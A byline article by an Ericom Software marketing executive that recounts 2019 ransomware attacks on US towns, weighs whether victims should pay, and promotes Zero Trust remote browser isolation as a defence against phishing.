By Gerry Grealish, Chief Marketing Officer, Ericom Software
On August 16, 2019, 22 small towns, municipalities and local governments in Texas were hit by a coordinated ransomware attack. The hackers demanded a total of $2.5 million to unlock the files. Almost one month later, not a single entity had paid the ransom and over half those affected were up and running after restoring from backups.
In June of the same year, Lake City, Florida a small town of just over 12,000 people was crippled by a ransomware attack that immobilized the city, preventing employees from using email and citizens from paying bills online. The city opted to pay a ransom of $460,000 in bitcoin to the attackers. Riviera Beach, another Florida city, also suffered a ransomware attack and paid nearly $600,000 in ransom. New Bedford, Massachusetts rejected demands for $5.3 million in ransom, as did Atlanta. The list goes on.
To Pay or Not to Pay?
The question that every government agency will ultimately have to face when hit by a ransomware attack is whether it should pay the ransom or not.
Unfortunately, security experts and law enforcement officials often offer conflicting advice. Law enforcement officials discourage governments from paying the ransom, since capitulation incentivizes cybercriminals to continue targeting similar organizations. Security and business consultants, such as Forrester for example, acknowledge that paying the ransom is a viable option for retrieving encrypted information – as well as the fastest and sometimes, least costly.
One practical concern is that paying ransom does not guarantee agencies will retrieve the information that was seized. A survey of nearly 1,200 IT security professionals across 17 countries conducted by CyberEdge Group, research, and marketing firm, revealed that of the 38.7% of individuals who chose to pay ransom following an attack, less than one fifth (19.1%) were able to regain access to all critical data.
Plan of Cyberattack
Ransomware attacks are most often initiated via spear-phishing emails with appeals customized to targeted employees. When the unsuspecting recipient clicks on a malicious link within the email or opens an infected attachment, web-based command and control servers deploy malware payloads via device browsers.
Despite being one of the oldest hacking techniques around, phishing remains the vehicle of choice for malicious actors, who excel at generating innovative and highly effective ways to manipulate recipients. The rise of free hosting providers has significantly contributed to the increase in phishing volume, since malicious actors can easily and inexpensively launch and importantly, quickly take down sites before they can be categorized as malicious.
By coupling free hosting sites with targeted social engineering techniques, threat actors easily defeat traditional, reputation-based cybersecurity tools and systems. Detection and categorization-based cybersecurity solutions are powerless against this onslaught. And while employee training is essential, human error is inevitable. Just one erroneous click by a distracted employee can paralyze an entire city.
According to a 2019 report from Cybersecurity Ventures sponsored by Herjavec Group, a business will fall victim to a ransomware attack every 14 seconds in 2019, and every 11 seconds in 2021. Ransomware damages are predicted to reach a global cost of $11.5 billion in 2019.
Secure Zero Trust Browsing for Government Entities
Government entities can circumvent most cyberthreats if they operate under the Zero Trust principle that no individual or element is to be trusted. No traffic, whether internal or external, should be assumed safe.
Zero Trust solutions leverage granular security policies that allow organizations to control, restrict and monitor communications between data, applications, networks and individuals. All elements are micro-segmented, and access is restricted in accordance with stringent security policies and user authentication.
It’s a basic fact of contemporary life that the internet is not safe. In fact, the internet is a critical part of the delivery chain for most threats. Zero Trust supporters address this fact by recommending that known secure sites be whitelisted and access denied to all other sites. This is, however, highly impractical for most businesses, which rely on the internet for many essential business tasks. Limiting access reduces productivity, leaves employees frustrated and increases workloads for IT staff, who must divert attention from critical tasks to manage access requests. Users are forced to wait for IT approval and intervention in order to complete their tasks.
When it comes to browsing, Zero Trust security must ensure that no site can interact with vulnerable endpoint browsers and through them, organizational networks. One method of implementing Zero Trust browsing that is rapidly gaining traction is remote browser isolation (RBI), which sequesters all direct interaction with websites in virtual browsers located remote from endpoints.
When a user opens a browser or tab, a virtual browser is spun up within a container in the cloud. All direct contact with websites and applications occurs within that container – no content reaches the end-users device. A safe media stream is sent from the remote browser to the user’s endpoint browser, allowing them to interact naturally with the site. Some RBI solutions also sanitize downloads through a content disarm and reconstruction process before releasing them to the endpoint. When the user stops browsing, the container along with all content from the browsed site is destroyed.
RBI protects government agencies from users’ erroneous clicks on phishing emails by opening linked sites in the remote container. In addition, some solutions address credential theft by blocking known malicious sites and opening suspicious sites in read-only mode.
Public sector organizations are on track to embrace the Zero Trust paradigm. Until that happens, however, their security situation will continue to be challenging and complex. Zero Trust Browsing using RBI provides a practical path to rapidly reduce threats and realize both security and productivity when it comes to threats delivered via the web.
About the Author
Gerry Grealish is the Chief Marketing Officer at Ericom, where he is responsible for the company’s outbound marketing and business development activities. He is a security industry veteran, with over 20 years of Marketing and product experience in cybersecurity and related technologies. In addition to his work at Ericom, Gerry is a frequent contributor to cybersecurity dialogue in areas such as Zero Trust Security, Cloud Access Security Brokers (CASB), and Web/Cloud Security. Connect with Gerry on LinkedIn.